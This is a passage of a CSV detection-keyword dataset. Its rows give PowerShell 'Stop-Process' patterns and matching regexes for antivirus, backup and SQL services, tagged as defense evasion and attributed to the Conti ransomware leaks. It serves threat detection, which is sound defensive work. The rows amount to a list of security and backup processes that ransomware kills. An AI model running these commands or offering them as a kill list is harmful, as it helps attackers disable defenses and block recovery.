- T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name AcronisAgent*",".{0,1000}Stop\-Process\s\-Name\sAcronisAgent.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - 
T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name acrsch2svc*",".{0,1000}Stop\-Process\s\-Name\sacrsch2svc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name AcrSch2Svc*",".{0,1000}Stop\-Process\s\-Name\sAcrSch2Svc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name agntsvc*",".{0,1000}Stop\-Process\s\-Name\sagntsvc.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name Antivirus*",".{0,1000}Stop\-Process\s\-Name\sAntivirus.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" 
"*Stop-Process -Name ARSM /y*",".{0,1000}Stop\-Process\s\-Name\sARSM\s\/y.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name arsm*",".{0,1000}Stop\-Process\s\-Name\sarsm.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name AVP*",".{0,1000}Stop\-Process\s\-Name\sAVP.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name backp*",".{0,1000}Stop\-Process\s\-Name\sbackp.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name backup*",".{0,1000}Stop\-Process\s\-Name\sbackup.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name BackupExec*",".{0,1000}Stop\-Process\s\-Name\sBackupExec.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name BackupExecAgent*",".{0,1000}Stop\-Process\s\-Name\sBackupExecAgent.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name bedbg /y*",".{0,1000}Stop\-Process\s\-Name\sbedbg\s\/y.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name cbservi*",".{0,1000}Stop\-Process\s\-Name\scbservi.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name 
cbvscserv*",".{0,1000}Stop\-Process\s\-Name\scbvscserv.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name DCAgent*",".{0,1000}Stop\-Process\s\-Name\sDCAgent.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name EhttpSrv*",".{0,1000}Stop\-Process\s\-Name\sEhttpSrv.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name ekrn*",".{0,1000}Stop\-Process\s\-Name\sekrn.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name EPSecurityService* ",".{0,1000}Stop\-Process\s\-Name\sEPSecurityService.{0,1000}\s\s\s\s","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name EPUpdateService* ",".{0,1000}Stop\-Process\s\-Name\sEPUpdateService.{0,1000}\s\s\s\s\s\s\s","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name EsgShKernel*",".{0,1000}Stop\-Process\s\-Name\sEsgShKernel.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name ESHASRV*",".{0,1000}Stop\-Process\s\-Name\sESHASRV.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name FA_Scheduler*",".{0,1000}Stop\-Process\s\-Name\sFA_Scheduler.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name 
IMAP4Svc*",".{0,1000}Stop\-Process\s\-Name\sIMAP4Svc.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name KAVFS*",".{0,1000}Stop\-Process\s\-Name\sKAVFS.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name KAVFSGT*",".{0,1000}Stop\-Process\s\-Name\sKAVFSGT.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name kavfsslp*",".{0,1000}Stop\-Process\s\-Name\skavfsslp.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name klnagent*",".{0,1000}Stop\-Process\s\-Name\sklnagent.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name macmnsvc*",".{0,1000}Stop\-Process\s\-Name\smacmnsvc.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name masvc*",".{0,1000}Stop\-Process\s\-Name\smasvc.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MBAMService*",".{0,1000}Stop\-Process\s\-Name\sMBAMService.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MBEndpointAgent* ",".{0,1000}Stop\-Process\s\-Name\sMBEndpointAgent.{0,1000}\s\s\s\s","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name McAfeeEngineService* 
",".{0,1000}Stop\-Process\s\-Name\sMcAfeeEngineService.{0,1000}\s\s\s\s","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name McAfeeFramework*",".{0,1000}Stop\-Process\s\-Name\sMcAfeeFramework.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name McAfeeFrameworkMcAfeeFramework*",".{0,1000}Stop\-Process\s\-Name\sMcAfeeFrameworkMcAfeeFramework.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name McShield*",".{0,1000}Stop\-Process\s\-Name\sMcShield.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name mfefire*",".{0,1000}Stop\-Process\s\-Name\smfefire.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name mfemms*",".{0,1000}Stop\-Process\s\-Name\smfemms.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name mfevtp*",".{0,1000}Stop\-Process\s\-Name\smfevtp.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name mozyprobackup*",".{0,1000}Stop\-Process\s\-Name\smozyprobackup.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MsDtsServer*",".{0,1000}Stop\-Process\s\-Name\sMsDtsServer.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name 
MsDtsServer100*",".{0,1000}Stop\-Process\s\-Name\sMsDtsServer100.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MsDtsServer110*",".{0,1000}Stop\-Process\s\-Name\sMsDtsServer110.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name msftesql$PROD*",".{0,1000}Stop\-Process\s\-Name\smsftesql\$PROD.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSOLAP$SQL_2008*",".{0,1000}Stop\-Process\s\-Name\sMSOLAP\$SQL_2008.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSOLAP$SYSTEM_BGC*",".{0,1000}Stop\-Process\s\-Name\sMSOLAP\$SYSTEM_BGC.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSOLAP$TPS*",".{0,1000}Stop\-Process\s\-Name\sMSOLAP\$TPS.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSOLAP$TPSAMA*",".{0,1000}Stop\-Process\s\-Name\sMSOLAP\$TPSAMA.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSSQL$BKUPEXEC*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$BKUPEXEC.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSSQL$ECWDB2*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$ECWDB2.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name 
MSSQL$PRACTICEMGT*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$PRACTICEMGT.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSSQL$PRACTTICEBGC*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$PRACTTICEBGC.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSSQL$PROD*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$PROD.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSSQL$PROFXENGAGEMENT*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$PROFXENGAGEMENT.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSSQL$SBSMONITORING*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$SBSMONITORING.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSSQL$SHAREPOINT*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$SHAREPOINT.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSSQL$SOPHOS*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$SOPHOS.{0,1000}","greyware_tool_keyword","powershell","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSSQL$SQL_2008*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$SQL_2008.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSSQL$SQLEXPRESS*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$SQLEXPRESS.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" 
"*Stop-Process -Name MSSQL$SYSTEM_BGC*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$SYSTEM_BGC.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSSQL$TPS*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$TPS.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSSQL$TPSAMA*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$TPSAMA.{0,1000}","greyware_tool_keyword","powershell","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*Stop-Process -Name MSSQL$VEEAMSQL*",".{0,1000}Stop\-Process\s\-Name\sMSSQL\$VEEAMSQL.{0,1000}","greyware_tool_keyword","powershell","stopping backup 